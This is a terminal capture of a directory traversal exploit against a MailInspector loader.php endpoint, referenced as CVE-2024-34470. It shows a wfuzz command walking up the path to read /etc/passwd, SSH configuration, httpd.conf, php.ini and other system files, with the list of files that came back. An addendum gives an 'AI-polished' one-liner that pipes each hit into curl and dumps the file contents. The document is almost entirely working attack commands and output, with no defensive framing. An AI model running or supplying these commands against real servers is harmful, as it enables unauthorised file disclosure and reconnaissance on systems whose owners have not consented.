┌──(root㉿kali)-[~]
└─# wfuzz -u http://XXX.XXX.XXX.XXX/mailinspector/public/loader.php?path=../../../../../../..FUZZ -w ~/weapons/http-payloads/linux_dir.txt --hl 0
********************************************************
* Wfuzz 3.1.0 - The Web Fuzzer *
********************************************************
Target: http://XXX.XXX.XXX.XXX/mailinspector/public/loader.php?path=../../../../../../..FUZZ
Total requests: 201
=====================================================================
ID Response Lines Word Chars Payload
=====================================================================
000000031: 200 1 L 2 W 28 Ch "/etc/ld.so.conf"
000000017: 200 9 L 54 W 687 Ch "/etc/fstab"
000000016: 200 13 L 53 W 404 Ch "/etc/crontab"
000000029: 200 131 L 446 W 3523 Ch "/etc/init.d/httpd"
000000030: 200 476 L 1763 W 14066 Ch "/etc/init.d/mysql"
000000038: 200 36 L 48 W 1645 Ch "/etc/passwd"
000000053: 200 2 L 4 W 48 Ch "/etc/resolv.conf"
000000057: 200 52 L 262 W 1836 Ch "/etc/ssh/ssh_config"
000000058: 200 52 L 262 W 1836 Ch "/etc/ssh/ssh_config"
000000020: 200 24 L 88 W 560 Ch "/etc/httpd/conf.d/php.conf"
000000072: 200 3 L 3 W 67 Ch "/etc/sysconfig/network"
000000071: 200 3 L 3 W 67 Ch "/etc/sysconfig/network"
000000069: 200 1 L 2 W 382 Ch "/etc/ssh/ssh_host_rsa_key.pub"
000000066: 200 1 L 3 W 627 Ch "/etc/ssh/ssh_host_key.pub"
000000070: 200 1 L 2 W 382 Ch "/etc/ssh/ssh_host_rsa_key.pub"
000000065: 200 1 L 3 W 627 Ch "/etc/ssh/ssh_host_key.pub"
000000062: 200 1 L 2 W 590 Ch "/etc/ssh/ssh_host_dsa_key.pub"
000000039: 200 182 L 491 W 4608 Ch "/etc/php.ini"
000000061: 200 1 L 2 W 590 Ch "/etc/ssh/ssh_host_dsa_key.pub"
000000021: 200 991 L 4834 W 33726 Ch "/etc/httpd/conf/httpd.conf"
000000143: 200 8 L 6 W 306 Ch "/usr/local/Zend/etc/php.ini"
Total time: 0
Processed Requests: 201
Filtered Requests: 180
Requests/sec.: 0
Reference: CVE-2024-34470
Addendum: AI-polished version of the command
wfuzz -u 'http://x.x.x.x/mailinspector/public/loader.php?path=../../../../../../..FUZZ' -w ~/weapons/http-payloads/linux_dir.txt --hl 0 | grep '"/' | awk '!/ 0 L/' | cut -d '"' -f 2 | xargs -I {} sh -c 'echo "$1,<--------"; curl -s "http://x.x.x.x/mailinspector/public/loader.php?path=../../../../../../..$1"' _ {}